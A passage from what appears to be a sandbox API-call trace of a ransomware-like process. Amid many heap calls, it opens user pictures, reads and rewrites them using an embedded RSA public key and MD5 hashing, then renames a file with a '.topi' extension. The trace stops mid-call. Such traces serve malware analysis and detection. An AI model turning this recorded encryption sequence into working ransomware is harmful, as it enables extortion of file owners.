(HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a90 [0096.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4aa8 [0096.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a78 [0096.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4ac0 [0096.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0096.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a90 | out: hHeap=0x680000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a90 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a90 | out: hHeap=0x680000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ac0 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4aa8 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a78 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a60 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02b40 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.657] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x15ab2, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x15ab2, lpOverlapped=0x0) returned 1 [0096.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.658] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x15ab7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.658] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.658] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.658] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.658] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.658] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.658] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.658] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.658] CloseHandle (hObject=0x6a8) returned 1 [0096.660] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b41c0 [0096.660] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0096.660] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0096.660] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\3X MOoy04if5aqsW.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\3x mooy04if5aqsw.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\3X MOoy04if5aqsW.bmp.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\3x mooy04if5aqsw.bmp.topi")) returned 1 [0096.661] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.661] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.661] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.662] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bc25d30, ftCreationTime.dwHighDateTime=0x1d5bdea, ftLastAccessTime.dwLowDateTime=0xc4c8830, ftLastAccessTime.dwHighDateTime=0x1d5b6ac, ftLastWriteTime.dwLowDateTime=0xc4c8830, ftLastWriteTime.dwHighDateTime=0x1d5b6ac, nFileSizeHigh=0x0, nFileSizeLow=0x12263, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6LaXOT R uZJB_hl2.png", cAlternateFileName="6LAXOT~1.PNG")) returned 1 [0096.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4258 [0096.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.662] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\6LaXOT R uZJB_hl2.png") returned=".png" [0096.662] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\6LaXOT R uZJB_hl2.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\6laxot r uzjb_hl2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.662] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=74339) returned 1 [0096.662] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.665] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1223d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.665] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.666] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.666] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x12263, lpOverlapped=0x0) returned 1 [0096.666] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.666] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.666] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.666] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.667] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.667] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.667] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.667] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.667] GetLastError () returned 0x0 [0096.668] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.668] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.668] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.668] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.668] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x12260) returned 0x9a06a00 [0096.668] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02b40 [0096.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a60 [0096.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02b88 [0096.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a78 [0096.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4aa8 [0096.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ac0 [0096.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.669] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4aa8 | out: hHeap=0x680000) returned 1 [0096.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ac0 | out: hHeap=0x680000) returned 1 [0096.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4ac0 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4aa8 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ac0 | out: hHeap=0x680000) returned 1 [0096.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4aa8 | out: hHeap=0x680000) returned 1 [0096.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.669] GetCurrentThreadId () returned 0x8c4 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f83d0 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.670] GetCurrentThreadId () returned 0x8c4 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.670] HeapFree (in: 